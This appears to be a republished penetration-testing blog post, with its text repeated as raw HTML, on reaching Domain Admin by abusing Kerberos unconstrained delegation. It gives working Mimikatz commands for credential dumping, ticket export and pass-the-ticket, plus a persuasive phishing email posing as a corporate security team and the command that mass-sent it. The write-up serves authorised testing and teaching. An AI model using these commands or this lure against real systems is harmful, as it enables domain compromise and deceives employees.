Getting Domain Admin with Kerberos Unconstrained Delegation

A recent penetration test was one of the rare ones where it was not possible to locate a domain admin credential (password/hash/ticket) using the usual methods. I already had Administrator access to one of the server thanks to a file upload feature in an in-house log management dashboard running over WAMP (WAMP runs with SYSTEM privileges). I got access to few more servers by using hashes of a domain user who was local admin on couple more servers and some more similar stuff, but still no luck.

Anyway, after looking around for Active Directory and Kerberos related attacks for a while, it was time for reconsidering the attack approach. Recall the first thing which comes to mind when we fail at server side attacks? Absolutely! Client side attacks. I could drop some emails with attachments and links and hope for hitting a user machine which leads me to a server which has a Domain Admin token. The client, for his own reasons, wanted me to keep all the connect back shells/requests from phishing within the internal network and there was absolutely no outgoing traffic allowed towards my VPN machine.(Diagram build with draw.io)

So, either I needed to setup multiple listeners on one of the compromised servers which can handle multiple connect back shells or some way to use an existing service as a listener for my phishing attacks. Since I am lazy 🙂 I decided to go with the second option, that is, using an existing service. While enumerating the domain after initial foothold, I saw that a web server had Kerberos Unconstrained Delegation enabled.

Once I realized Kerberos Unconstrained Delegation was enabled, I could attempt to exploit this scenario using a technique Sean Metcalf (@PyroTek3) spoke about last year and published on ADSecurity.org (https://adsecurity.org/?p=1667). Sean covers how exploiting a server with Kerberos Unconstrained Delegation can lead to credential theft of DA credentials resulting in Active Directory compromise by tricking a Domain Admin into connecting to any Kerberos service on the server.

So, all that needed to be done was creating phishing emails and use them to connect back to the server where I had admin access and wait for a domain admin to fall for an email.

Here is how I did it (replicated in my lab).

1. pfptlab-build is the server where we have admin access with RDP, PowerShell Remoting etc.
2. pfptlab-web is the server where we can execute commands as admin but it is not directly accessible.

Searching for computers with Unconstrained Delegation

By using the built-in Active Directory PowerShell Module. This module is available by default on Windows Server 2012. From an elevated shell on the server with admin access (pfptlab-build) use the below commands:

PS C:\> Add-WindowsFeature RSAT-AD-PowerShell<br />PS C:\> Import-Module ActiveDirectory<br />PS C:\> Get-ADComputer –Filter {(TrustedForDelegation –eq $True) –and (PrimaryGroupID –eq 515)}<br />

I have wrapped up above commands in a script Get-Unconstrained.ps1 found in the ActiveDirectory category of Nishang.

Another way of searching for computers with Unconstrained Delegation is using Powerview:

PS C:\> Get-NetComputer -Unconstrained<br />

Setting up the “Listener”

On the server where unconstrained delegation is enabled (pfptlab-web in the lab), we can enumerate existing tickets using Invoke-Mimikatz. Keep in mind that we have admin access to the server with the help of hash of a domain user who is local admin on that server. Please note that we can pass the ticket as well but the expiry time of the ticket will play a spoilsport here as we need to wait till a domain admin connects to the machine.

We can use the hash of domain user webadmin which is a local admin on the pfptlab-web, the server with unconstrained delegation:

PS C:\> Invoke-Mimikatz -DumpCreds<br />PS C:\> Invoke-Mimikatz -Command '"sekurlsa::pth /user:webadmin /domain:pfptlab /ntlm:[ntlm hash] /run:powershell.exe"'<br />

This is how the output of these commands look like:

Now, let’s list tickets on pfptlab-web, the server with Unconstrained Delegation. Since, we have direct access to the pfptlab-build machine, let’s *drop the script on disk* there and use below commands to use it in a stateful session on pfptlab-web without touching disk. Remember that below commands need to be run in the PowerShell console opened by over-passing the hash of the webadmin user:

PS C:\> $sess = New-PSSession -ComputerName pfptlab-web<br />PS C:\> Invoke-Command -FilePath C:\Users\buildadmin\Desktop\Invoke-Mimikatz.ps1 -Session $sess<br />PS C:\> Invoke-Command -ScriptBlock {cd $env:TEMP} -Session $sess<br />PS C:\> Invoke-Command -ScriptBlock {Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'} -Session $sess<br />

An alternate way with a catch!
A quick thing to note here. If we try to use below command (to execute Invoke-Mimikatz on pfptlab-web without dropping the script to disk on pftplab-build) there will be an error.

PS C:\> Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -ArgumentList '-Command "sekurlsa::tickets"' -ComputerName pfptlab-web<br />

Because, we cannot pass named parameters in the -ArgumentList parameter. It is not possible to pass “-Command ‘”sekurlsa::tickets”‘” in the above case. We can pass only the positional parameters. To overcome this I changed the positions of the parameters. I assigned position 0 to the “Command” parameter of Invoke-Mimikatz and the above command worked successfully. Now the catch! If I add “/export” to the ArgumentList parameter in the above command, it fails as PowerShell passes it to the Invoke-Mimikatz as second parameter. If anyone is able to do that successfully, please share!

So, assuming that we have enumerated the Domain Administrator accounts already and one of them is the “Administrator”, to know if a domain admin has connected we can use the following ugly method:

PS C:\> $output = Invoke-Command -ScriptBlock {(ls $env:temp\*.kirbi).name} -Session $sess<br />PS C:\> $output | sls Administrator<br />

May be someone will automate this in a much cleaner way. If a ticket of the Domain Administrator, Administrator, is saved by Mimikatz, the second command above should list it. But, no Domain Admin ticket on pfptlab-web, yet.

Preparing email

Fortunately, the client’s internal mail server allowed email relaying so sending phishing emails was not a problem. I was able to get access to email ids with a combination of AD usernames and couple of email excel files I got my hands on. After sharing the emails with the client, he removed emails of some guys from the management. One of the multiple email templates used was:

Hey, <br /><br />I am from the Corporate Security Team, we look after security here. We have detected multiple anomalies in the network which could be traced back to your system. It could be a virus or a trojan attack which blocks you from accessing company resources. You are required to immediately perform all of the below steps:<br />1. Click on Start Menu -> Type cmd.exe<br />2. In the Window which opens up. type "reg query HKLM\SOFTWARE\Microsoft\"<br />3. Copy the contents of above command in a text file.<br />4. Go to \\[name of server with unconstrained delegation]\C$ and copy the file there.<br />5. If you are unable to access the share, just save the text file with the name Sotware_log.txt on your Desktop and we will pick it up. <br /><br />Cheers,<br /><br />Corporate Security Team<br />

While I am no expert in crafting phishing emails, I would like you to note some points in the above email:
– No intimidation but a balanced tone of Authority.
– Use of jargon but not too obscure words, as if I was really trying to explain complex things in simple terms to the user.
– Requirment of urgent action by the target user.
– Command which displays a lot of output.
– Providing an alternate way to the user if they can’t access the share which makes me look more helpful.
Though I tried to pick the “email culture” of the client from the emails I exchanged, surely, this email could be written in a lot better way.

Using the below command, email was sent to users.

PS C:\> Send-MailMessage -From "Corporate Security<corporate.security@client.com>" -To $recipients -Subject "Security Anomaly: Action Required" -Body (Get-Content C:\Users\buildadmin\Desktop\email.txt | Out-String) -SmtpServer [IP of internal mail server]<br />

This is how the email looked in like in mailbox of one of the targets.

Execution

After sending email, I started checking the tickets for Domain Administrator by running Invoke-Mimikatz repeatedly and soon there were more than one domain administrators who complied to whatever they were asked to do 😀

Now, in my opinion, the best way to use the tickets is to copy them to the pfptlab-build server as we have direct connectivity to it. Using the below command we can copy all the tokens from the pfptlab-web to pfptlab-build machine.

PS C:\> Copy-Item \\pfptlab-web\C$\Users\WEBADM~1.PFP\AppData\Local\Temp\*.kirbi C:\tickets<br />

Now, we can use one of the Administrators tickets copied locally to elevate our privileges to Domain Administrator:

PS C:\> Invoke-Mimikatz -Command '"kerberos::ptt [Ticket]<br />

Awesome! Finally Domain Admin access. Let the victory dance begin 😀 😀

Here is a quick video to demonstrate the attack:

After getting the DA access, I gathered some business related data to demonstrate actual impact to the client management.

Please leave feedback and comments.

Learn penetration testing of a highly secure, live Windows network with me in PowerShell for Penetration Testers Training at:

CanSecWest, Vancouver (4 days – March 12-15th, 2016) – https://cansecwest.com/dojos/2016/powershell.html

Brucon, Gent, Belgium (3 days – April 20-22nd, 2016) – http://2016.brucon.org/index.php/Spring_Training_2016_-_PowerShell_for_Penetration_Testers

HITB, Amsterdam (2 days – May 24-25th, 2016) – http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/

Print Share Comment Cite Upload Translate

APA

() » Getting Domain Admin with Kerberos Unconstrained Delegation. Retrieved from https://www.truth.cx/2016/02/28/getting-domain-admin-with-kerberos-unconstrained-delegation/.

MLA

" » Getting Domain Admin with Kerberos Unconstrained Delegation." - , https://www.truth.cx/2016/02/28/getting-domain-admin-with-kerberos-unconstrained-delegation/

HARVARD

» Getting Domain Admin with Kerberos Unconstrained Delegation., viewed ,

VANCOUVER

- » Getting Domain Admin with Kerberos Unconstrained Delegation. [Internet]. [Accessed ]. Available from: https://www.truth.cx/2016/02/28/getting-domain-admin-with-kerberos-unconstrained-delegation/

CHICAGO

" » Getting Domain Admin with Kerberos Unconstrained Delegation." - Accessed . https://www.truth.cx/2016/02/28/getting-domain-admin-with-kerberos-unconstrained-delegation/

IEEE

" » Getting Domain Admin with Kerberos Unconstrained Delegation." [Online]. Available: https://www.truth.cx/2016/02/28/getting-domain-admin-with-kerberos-unconstrained-delegation/. [Accessed: ]

Select a language:

<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: justify;">A recent penetration test was one of the rare ones where it was not possible to locate a domain admin credential (password/hash/ticket) using the usual methods. I already had Administrator access to one of the server thanks to a file upload feature in an in-house log management dashboard running over WAMP (WAMP runs with SYSTEM privileges). I got access to few more servers by using hashes of a domain user who was local admin on couple more servers and some more similar stuff, but still no luck. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Anyway, after looking around for Active Directory and Kerberos related attacks for a while, it was time for reconsidering the attack approach. Recall the first thing which comes to mind when we fail at server side attacks? Absolutely! Client side attacks. I could drop <a href="http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html">some emails with attachments and links</a> and hope for hitting a user machine which leads me to a server which has a Domain Admin token. The client, for his own reasons, wanted me to keep all the connect back shells/requests from phishing within the internal network and there was absolutely no outgoing traffic allowed towards my VPN machine.(Diagram build with <a href="http://draw.io/">draw.io</a>)</div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-9OBOyjtWkaw/VtEyaqJg3YI/AAAAAAAACOY/k-WAFU4I2UQ/s1600/Kerberos%2BUnsonctrained%2BDelegation.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://4.bp.blogspot.com/-9OBOyjtWkaw/VtEyaqJg3YI/AAAAAAAACOY/k-WAFU4I2UQ/s400/Kerberos%2BUnsonctrained%2BDelegation.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div></div><div style="text-align: justify;"></div><div style="text-align: justify;"></div><div style="text-align: justify;">So, either I needed to setup multiple listeners on one of the compromised servers which can handle multiple connect back shells or some way to use an existing service as a listener for my phishing attacks. Since I am lazy :) I decided to go with the second option, that is, using an existing service. While enumerating the domain after initial foothold, I saw that a web server had <a href="http://blogs.msdn.com/b/autz_auth_stuff/archive/2011/05/03/kerberos-delegation.aspx">Kerberos Unconstrained Delegation</a> enabled.</div><div style="text-align: justify;"><br />Once I realized Kerberos Unconstrained Delegation was enabled, I could attempt to exploit this scenario using a technique Sean Metcalf (<a href="https://twitter.com/PyroTek3">@PyroTek3</a>) spoke about last year and published on ADSecurity.org  (<a href="https://adsecurity.org/?p=1667">https://adsecurity.org/?p=1667</a>). Sean covers how exploiting a server with Kerberos Unconstrained Delegation can lead to credential theft of DA credentials resulting in Active Directory compromise by tricking a Domain Admin into connecting to any Kerberos service on the server.<br /><br />So, all that needed to be done was creating phishing emails and use them to connect back to the server where I had admin access and wait for a domain admin to fall for an email.<br /><br />Here is how I did it (replicated in my lab). </div><div style="text-align: justify;">1. pfptlab-build is the server where we have admin access with RDP, PowerShell Remoting etc.<br />2. pfptlab-web is the server where we can execute commands as admin but it is not directly accessible.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-LApzK7y542Q/VtEyxwK8kuI/AAAAAAAACOc/A1kmZBC3WPI/s1600/Kerberos%2BUnsonctrained%2BDelegation%2BLab.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://1.bp.blogspot.com/-LApzK7y542Q/VtEyxwK8kuI/AAAAAAAACOc/A1kmZBC3WPI/s400/Kerberos%2BUnsonctrained%2BDelegation%2BLab.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><h4>Searching for computers with Unconstrained Delegation</h4>By using the built-in Active Directory PowerShell Module. This module is available by default on Windows Server 2012. From an elevated shell on the server with admin access (pfptlab-build) use the below commands:<br /><pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Add-WindowsFeature RSAT-AD-PowerShell<br />PS C:\> Import-Module ActiveDirectory<br />PS C:\> Get-ADComputer –Filter {(TrustedForDelegation –eq $True) –and (PrimaryGroupID –eq 515)}<br />

I have wrapped up above commands in a script Get-Unconstrained.ps1 found in the ActiveDirectory category of Nishang.

Another way of searching for computers with Unconstrained Delegation is using Powerview:

PS C:\> Get-NetComputer -Unconstrained<br />

Setting up the "Listener"

PS C:\> Invoke-Mimikatz -DumpCreds<br />PS C:\> Invoke-Mimikatz -Command '"sekurlsa::pth /user:webadmin /domain:pfptlab /ntlm:[ntlm hash] /run:powershell.exe"'<br />

This is how the output of these commands look like:

Now, let's list tickets on pfptlab-web, the server with Unconstrained Delegation. Since, we have direct access to the pfptlab-build machine, let's *drop the script on disk* there and use below commands to use it in a stateful session on pfptlab-web without touching disk. Remember that below commands need to be run in the PowerShell console opened by over-passing the hash of the webadmin user:

PS C:\> $sess = New-PSSession -ComputerName pfptlab-web<br />PS C:\> Invoke-Command -FilePath C:\Users\buildadmin\Desktop\Invoke-Mimikatz.ps1 -Session $sess<br />PS C:\> Invoke-Command -ScriptBlock {cd $env:TEMP} -Session $sess<br />PS C:\> Invoke-Command -ScriptBlock {Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'} -Session $sess<br />

PS C:\> Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -ArgumentList '-Command "sekurlsa::tickets"' -ComputerName pfptlab-web<br />

Because, we cannot pass named parameters in the -ArgumentList parameter. It is not possible to pass "-Command '"sekurlsa::tickets"'" in the above case. We can pass only the positional parameters. To overcome this I changed the positions of the parameters. I assigned position 0 to the "Command" parameter of Invoke-Mimikatz and the above command worked successfully. Now the catch! If I add "/export" to the ArgumentList parameter in the above command, it fails as PowerShell passes it to the Invoke-Mimikatz as second parameter. If anyone is able to do that successfully, please share!

So, assuming that we have enumerated the Domain Administrator accounts already and one of them is the "Administrator", to know if a domain admin has connected we can use the following ugly method:

PS C:\> $output = Invoke-Command -ScriptBlock {(ls $env:temp\*.kirbi).name} -Session $sess<br />PS C:\> $output | sls Administrator<br />

Preparing email

Fortunately, the client's internal mail server allowed email relaying so sending phishing emails was not a problem. I was able to get access to email ids with a combination of AD usernames and couple of email excel files I got my hands on. After sharing the emails with the client, he removed emails of some guys from the management. One of the multiple email templates used was:

Hey, <br /><br />I am from the Corporate Security Team, we look after security here. We have detected multiple anomalies in the network which could be traced back to your system. It could be a virus or a trojan attack which blocks you from accessing company resources. You are required to immediately perform all of the below steps:<br />1. Click on Start Menu -> Type cmd.exe<br />2. In the Window which opens up. type "reg query HKLM\SOFTWARE\Microsoft\"<br />3. Copy the contents of above command in a text file.<br />4. Go to \\[name of server with unconstrained delegation]\C$ and copy the file there.<br />5. If you are unable to access the share, just save the text file with the name Sotware_log.txt on your Desktop and we will pick it up. <br /><br />Cheers,<br /><br />Corporate Security Team<br />

While I am no expert in crafting phishing emails, I would like you to note some points in the above email:
- No intimidation but a balanced tone of Authority.
- Use of jargon but not too obscure words, as if I was really trying to explain complex things in simple terms to the user.
- Requirment of urgent action by the target user.
- Command which displays a lot of output.
- Providing an alternate way to the user if they can't access the share which makes me look more helpful.
Though I tried to pick the "email culture" of the client from the emails I exchanged, surely, this email could be written in a lot better way.

Using the below command, email was sent to users.

PS C:\> Send-MailMessage -From "Corporate Security<corporate.security@client.com>" -To $recipients -Subject "Security Anomaly: Action Required" -Body (Get-Content C:\Users\buildadmin\Desktop\email.txt | Out-String) -SmtpServer [IP of internal mail server]<br />

This is how the email looked in like in mailbox of one of the targets.

Execution

PS C:\> Copy-Item \\pfptlab-web\C$\Users\WEBADM~1.PFP\AppData\Local\Temp\*.kirbi C:\tickets<br />

Now, we can use one of the Administrators tickets copied locally to elevate our privileges to Domain Administrator:

PS C:\> Invoke-Mimikatz -Command '"kerberos::ptt [Ticket]<br />

Awesome! Finally Domain Admin access. Let the victory dance begin :D :D

Here is a quick video to demonstrate the attack:

After getting the DA access, I gathered some business related data to demonstrate actual impact to the client management.

Please leave feedback and comments.

Learn penetration testing of a highly secure, live Windows network with me in PowerShell for Penetration Testers Training at:

CanSecWest, Vancouver (4 days - March 12-15th, 2016) - https://cansecwest.com/dojos/2016/powershell.html

Brucon, Gent, Belgium (3 days - April 20-22nd, 2016) - http://2016.brucon.org/index.php/Spring_Training_2016_-_PowerShell_for_Penetration_Testers

HITB, Amsterdam (2 days - May 24-25th, 2016) - http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/

First name:

Last name:

Searching for computers with Unconstrained Delegation

Setting up the “Listener”

Preparing email

Execution

Setting up the "Listener"

Preparing email

Execution

Related Posts